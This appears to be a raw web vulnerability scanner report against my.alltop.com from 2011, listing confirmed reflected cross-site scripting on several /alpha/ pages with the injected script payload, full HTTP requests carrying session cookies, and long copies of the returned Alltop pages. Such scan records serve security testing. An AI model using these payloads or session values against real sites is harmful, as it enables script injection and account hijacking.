Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:44 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:44 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:44 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/e

/alpha/e CONFIRMED

http://my.alltop.com/alpha/e?'"--></style></script><script>alert(0x0001C1)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001C1)</script>

Request

GET /alpha/e?'"--></style></script><script>netsparker(0x0001C1)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:46 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:46 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/h

/alpha/h CONFIRMED

http://my.alltop.com/alpha/h?'"--></style></script><script>alert(0x0001C2)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001C2)</script>

Request

GET /alpha/h?'"--></style></script><script>netsparker(0x0001C2)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
